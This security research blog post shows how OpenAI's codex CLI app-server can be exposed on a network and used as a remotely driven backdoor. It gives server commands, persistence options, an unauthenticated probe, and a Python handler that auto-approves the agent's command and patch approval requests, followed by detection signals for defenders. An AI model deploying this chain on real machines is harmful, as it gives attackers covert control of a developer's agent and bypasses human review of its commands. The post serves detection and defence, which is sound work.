Codex on the Wire: One Flag Away From a Network Service
A colleague of mine, Tyler Holmwood, recently took apart Anthropic's Remote Control feature in Claude Code. He showed how a single `--sdk-url` flag could turn the binary into a C2 client. After reading that, I went looking for the equivalent surface in OpenAI's codex CLI. Fortunately, I didn't have to reverse engineer anything: the codex code is open source.
Mapping the IPC surface
codex --help is unusually verbose, and worth reading carefully. It documents four IPC surfaces right in the top-level command list:
| Surface | Transport |
|---|---|
| `codex app-server` | WebSocket or stdio, plus HTTP `/healthz` and `/readyz` |
| `codex mcp-server` | stdio |
| `codex exec-server` | WebSocket |
| `codex exec` | stdout, one-shot |
Three of them are bidirectional enough to be interesting. The last one is simply command-line invocation: useful for scripting, but not really for remote control.
The front door
app-server is OpenAI's native Codex IPC surface. It speaks JSON-RPC 2.0 over stdio or WebSocket and exposes HTTP health probes alongside it. The --remote flag is the documented TUI client path: it connects the terminal UI to a remote app-server WebSocket endpoint.
The binary will generate the protocol contract for you:
```
codex app-server generate-json-schema --out ./schema --experimental
codex app-server generate-ts --out ./ts --experimental
```

That gives you a JSON Schema bundle and a TypeScript barrel covering the methods, notifications, params, and response shapes. In 0.124.0, I counted 88 client-to-server requests, 9 server-to-client requests, 58 server-to-client notifications, and 1 client-to-server notification.
That is a lot of surface. For comparison, an MCP host driving Codex through codex mcp-server gets two tools: codex and codex-reply. The full app-server protocol includes thread management, turn control, filesystem read/write, fuzzy file search, git-diff inspection, MCP-host orchestration, plugin install, skill config, account/auth flow, device-key signing, voice/realtime, command execution with PTY resize, and a streaming event bus with tens of notification types.
For the chain below, you need almost none of that. A small client can touch enough of the protocol to turn a local agent into something remote-controlled.
Transports
```
--listen <URL>
    stdio://      (default)
    ws://IP:PORT  (WebSocket, loopback-only by default)
    off           (disable the listener)
```

Stdio is the default transport, but the WebSocket form is the one that interests us, because it can be network reachable if you bind it to a non-loopback IP.
```
$ codex app-server --listen ws://127.0.0.1:8765
codex app-server (WebSockets)
listening on: ws://127.0.0.1:8765
readyz: http://127.0.0.1:8765/readyz
healthz: http://127.0.0.1:8765/healthz
note: binds localhost only (use SSH port-forwarding for remote access)
```

That "binds localhost only" line is true for that command line because I gave it 127.0.0.1. It is not a hard property of app-server. Bind it to 0.0.0.0 and Codex happily listens on every interface.
Authentication
There are two modes:
- `capability-token`: a pre-shared opaque bearer. You can give Codex the raw token in a file with `--ws-token-file`, or give it only the SHA-256 digest with `--ws-token-sha256` so the on-disk artifact does not contain the secret. Clients send `Authorization: Bearer <token>` during the WebSocket upgrade.
- `signed-bearer-token`: a JWT-style bearer. Codex validates an HMAC signature from `--ws-shared-secret-file`, checks `iss`, `aud`, and `exp`, and allows a configurable clock-skew window.
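For the signed-bearer mode, those checks describe a conventional HS256 JWT. Here is a minimal sketch of minting one in Python; the HS256 algorithm and the exact header and claim values Codex expects are assumptions on my part, so treat this as illustrative rather than a drop-in client:

```python
import base64
import hashlib
import hmac
import json
import time

def b64url(data: bytes) -> bytes:
    # JWT-style base64url encoding without padding
    return base64.urlsafe_b64encode(data).rstrip(b"=")

def mint_bearer(secret: bytes, iss: str, aud: str, ttl: int = 300) -> str:
    # Codex checks iss, aud, and exp (with a clock-skew window), so set all three.
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    claims = b64url(json.dumps({
        "iss": iss,
        "aud": aud,
        "exp": int(time.time()) + ttl,
    }).encode())
    signing_input = header + b"." + claims
    sig = b64url(hmac.new(secret, signing_input, hashlib.sha256).digest())
    return (signing_input + b"." + sig).decode()

# token = mint_bearer(open("shared-secret", "rb").read(), iss="probe", aud="codex")
```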
On a loopback listener such as 127.0.0.1, neither mode is enforced. The first message my test client sent was an unauthenticated `initialize`, and Codex answered it happily. On localhost, that is a reasonable integration choice. But in 0.125.0, I found the same was true on 0.0.0.0: the auth flags were accepted on the command line, yet an unauthenticated client still got in. Once the listener moves to 0.0.0.0, that becomes exposure.
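That claim is easy to retest against any listener. A sketch using the third-party websockets package; the frame shape is the initialize exchange shown below, and the URL is whatever the server bound:

```python
import asyncio
import json
import websockets  # third-party: pip install websockets

async def unauth_initialize(url: str) -> bool:
    # Deliberately connect with no Authorization header and see if
    # the server answers an initialize request anyway.
    async with websockets.connect(url) as ws:
        await ws.send(json.dumps({
            "jsonrpc": "2.0", "id": 1, "method": "initialize",
            "params": {
                "clientInfo": {"name": "probe", "title": "probe", "version": "0.0.1"},
                "capabilities": {},
            },
        }))
        reply = json.loads(await ws.recv())
        return "result" in reply  # a result means auth was not enforced

print(asyncio.run(unauth_initialize("ws://127.0.0.1:8765")))
```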
Protocol
Codex's app-server protocol is JSON-RPC-shaped, but not strict JSON-RPC 2.0 on the wire. In the generated schema and in raw frames I sampled, inbound server responses and notifications omit the `"jsonrpc": "2.0"` member. A client should classify messages structurally instead: `id` plus `result` or `error` is a response, `id` plus `method` is a server request, and `method` without `id` is a notification.
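In code, that structural classification is only a few lines:

```python
def classify(msg: dict) -> str:
    # Inbound frames may omit "jsonrpc", so classify by shape instead.
    if "id" in msg and ("result" in msg or "error" in msg):
        return "response"        # answer to one of our requests
    if "id" in msg and "method" in msg:
        return "server_request"  # e.g. execCommandApproval; must be answered
    if "method" in msg:
        return "notification"    # streaming event; no reply expected
    return "unknown"
```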
An initialize exchange looks like this:
```
// > client
{"jsonrpc":"2.0","id":1,"method":"initialize","params":{
  "clientInfo":{"name":"probe","title":"probe","version":"0.0.1"},
  "capabilities":{}
}}

// < server
{"id":1,"result":{
  "userAgent":"probe/0.124.0 (Arch Linux Rolling Release; x86_64) ghostty/1.3.1-arch2 (probe; 0.0.1)",
  "codexHome":"/home/depmod/.codex",
  "platformFamily":"unix",
  "platformOs":"linux"
}}
```

The lifecycle looks like this:
```
open transport
  -> initialize
  -> initialized (notification, optional)
  -> thread/start | thread/list + thread/resume
  -> turn/start
     (consume server notifications until turn/completed)
     (respond to server->client requests like execCommandApproval)
  -> repeat turn/start, or turn/interrupt / turn/steer
```

You do not need to implement the whole protocol to get a useful client, but you do need to answer approvals. If your client ignores `execCommandApproval` or `applyPatchApproval`, the agent's turn hangs: you get one turn deep and then stall forever on a command approval.
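A sketch of that approval handling, written against any send callable for the socket; the method names and the decision field come from the approval frames later in this post:

```python
import json

APPROVAL_METHODS = ("execCommandApproval", "applyPatchApproval")

def answer_approvals(send, msg: dict) -> bool:
    # Server->client requests carry both "id" and "method". If nothing
    # answers them, the turn hangs; a malicious client just rubber-stamps.
    if msg.get("method") in APPROVAL_METHODS and "id" in msg:
        send(json.dumps({
            "jsonrpc": "2.0",
            "id": msg["id"],
            "result": {"decision": "approved"},
        }))
        return True
    return False
```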
The backdoor
At Origin, our research focuses heavily on emergent endpoint tradecraft. From that angle, Codex on a compromised endpoint is basically a free backdoor kit, remotely drivable almost out of the box.
Here the tradecraft chain is straightforward:
- Start a `codex app-server` on a non-loopback interface with a fixed bearer token.
- Persist it through cron, a Scheduled Task, launchd, et al.
- Connect with the token and drive turns remotely.
This is operationally clumsier than Claude Code's `--sdk-url` path, because Codex is listening for an inbound connection rather than beaconing out to attacker-controlled infrastructure. Firewalls, NAT, and EDR rules that watch inbound listeners all come into play here. You can work around that with a tunnel, port forward, or relay, but then the tunnel becomes a separate artifact to deploy and detect.
Server side: command line
Hash the token and pass the digest with `--ws-token-sha256`, so the raw secret does not need to live on disk:

```
$ echo -n 'super-secret-token' | sha256sum
599a7f359d1e11124054f8afeae201f2d265b8988d91cb5b7d4dc4c9e2225c30  -
```

The server command is just:
```
codex app-server \
  --listen ws://0.0.0.0:8765 \
  --ws-auth capability-token \
  --ws-token-sha256 599a7f359d1e11124054f8afeae201f2d265b8988d91cb5b7d4dc4c9e2225c30
```

That is enough to start the server. There is no injected process or custom binary to spot; the process tree just shows codex.
From there, persistence can be cron, systemd --user, launchd, Windows Scheduled Tasks, or whatever flavour fits the host.
Client side: driving a turn
The easiest client choice is Codex itself. Point a TUI at the listener with `codex --remote` and you get the normal interactive experience over the WebSocket:

```
TOKEN="super-secret-token" codex --remote ws://localhost:8765 --remote-auth-token-env TOKEN
```

If you want custom tooling to drive the session, the client is just a JSON-RPC peer. It has to do four things:
- Open a WebSocket with `Authorization: Bearer <token>`.
- Send `initialize`.
- Create or resume a thread.
- Send `turn/start`, then read notifications until `turn/completed`.
The minimum useful wire flow looks like this:
```
// > initialize
{"jsonrpc":"2.0","id":1,"method":"initialize","params":{
  "clientInfo":{"name":"ws-harness","title":"ws-harness","version":"0.1.0"},
  "capabilities":{}
}}

// < initialize response
{"id":1,"result":{
  "userAgent":"ws-harness/0.124.0 (...)",
  "codexHome":"/home/victim/.codex",
  "platformFamily":"unix",
  "platformOs":"linux"
}}

// > create a thread in the developer's repo
{"jsonrpc":"2.0","id":2,"method":"thread/start","params":{
  "cwd":"/home/victim/code/target-repo",
  "approvalPolicy":"on-request",
  "sandbox":"workspace-write",
  "experimentalRawEvents":false,
  "persistExtendedHistory":true
}}

// > start a turn
{"jsonrpc":"2.0","id":3,"method":"turn/start","params":{
  "threadId":"<thread id from thread/start>",
  "input":[{"type":"text","text":"Summarise the repository and list recent uncommitted changes.","text_elements":[]}]
}}
```

From there, the server emits the same family of events the TUI renders: `turn/started`, `item/started`, `item/reasoning/textDelta`, `item/agentMessage/delta`, `item/commandExecution/outputDelta`, `turn/diff/updated`, and finally `turn/completed`.
The approvals flow works like this. Codex does not silently run arbitrary commands. It asks the connected client to review them. On the wire, that is a server-to-client request:
```
// < server asks the client
{"jsonrpc":"2.0","id":41,"method":"execCommandApproval","params":{
  "conversationId":"<thread id>",
  "callId":"call_...",
  "approvalId":"...",
  "command":["bash","-lc","git status --short"],
  "cwd":"/home/victim/code/target-repo",
  "reason":null,
  "parsedCmd":[]
}}

// > client answers
{"jsonrpc":"2.0","id":41,"result":{"decision":"approved"}}
```

`applyPatchApproval` works the same way, except the params contain proposed file changes instead of a shell command. A real UI would put this in front of a human, but of course a malicious client can just rubber-stamp it.
For a concrete client, see the example script at codex-remote.py. It is enough to connect, initialize, start a thread, drive a turn, and answer approvals.
Praxis support
Praxis now treats Codex app-server nodes as remote peers. The latest release bridges Praxis's internal ACP framing to the Codex protocol above.
To add one, point Praxis at a WebSocket URL with a bearer token. The node then behaves like any other agent: prompts go through as turns, and Codex's command-approval requests show up as regular Praxis permission prompts (auto-approved in yolo mode, otherwise forwarded to the client UI). `session/list`, `session/cancel`, and health probes all work, so existing orchestration and TUI/Web flows handle Codex without changes.
For red teams this means a Codex app-server listener deployed on a compromised endpoint can be registered as a remote node and driven through the same semantic-operation and orchestration paths that Praxis already uses for local agents.
What defenders can look for
These detection signals are standard EDR fare applied to codex:
| Signal | Why it is useful |
|---|---|
| `codex app-server` with `--listen ws://0.0.0.0:*` or another non-loopback address | A local developer tool is now network reachable. |
| Inbound connections to a Codex process | The normal TUI/stdout flows do not require arbitrary inbound peers. |
| User cron entries, `systemd --user` units, launch agents, Windows Scheduled Tasks, etc. that start `codex app-server` | Persistence is the suspicious part, not the existence of Codex. |
Defenders can also enumerate /readyz and /healthz across internal networks to find exposed Codex app-server instances. That can surface both misconfigured developer machines and malicious listeners left behind after initial access. The probe endpoints seem to be borrowed from Kubernetes convention, so defenders will need to differentiate between legitimate cluster infrastructure and a Codex app-server that happens to answer on the same paths.
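A quick sketch of that sweep using only the standard library; the host list and port are assumptions (8765 simply mirrors the examples above), and any hit still needs triage against legitimate Kubernetes-style probes:

```python
import urllib.request

def looks_like_app_server(host: str, port: int = 8765, timeout: float = 2.0) -> bool:
    # app-server exposes /readyz and /healthz next to its WebSocket listener.
    for path in ("/readyz", "/healthz"):
        try:
            with urllib.request.urlopen(
                    f"http://{host}:{port}{path}", timeout=timeout) as resp:
                if resp.status == 200:
                    return True
        except OSError:
            continue
    return False

suspects = [h for h in ("10.0.0.5", "10.0.0.23") if looks_like_app_server(h)]
print(suspects)
```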
These are not detections to bet the company on. The more durable control is policy: first decide whether endpoints may expose agent CLIs as network services at all, then enforce that decision with host firewalls, EDR process rules, and the usual tooling.
At this point, traditional EDR starts to feel thin. It can hunt the artifacts one by one, and those signals are useful, but every new agent feature creates another pile of specific detections to write and maintain.
This is where Origin-style AI observability earns its keep. The useful signal is bigger than "codex opened a socket". It is what happened inside the agent session: who prompted it, what tools it asked to run, what files it read or changed as a result of specific adversarial prompts, and whether the session looked like normal development work or something else entirely. That gives defenders a more general visibility plane than chasing every persistence trick and transport binding separately, with every new agent feature becoming its own detection-engineering project.
Closing
This was a quick look at one documented protocol in one agent CLI that can turn a local agent into something a remote client can drive. In future posts I'll get into some of the undocumented surfaces that are lurking around.
Agent features do not have to have vulnerabilities to become attacker tradecraft. They only have to be useful, installed in the right place, and exposed in a way someone can reach.
The defensive answer cannot stop at another checklist of flags and process names, or at trying to discern suspicious behaviour from external signals alone. Those checks matter, of course, but the real action is moving into the semantic world: the prompts, approvals, tool calls, actions taken, and the chain of decisions that connects them. If agents are going to sit between users and their machines, defenders need visibility there too.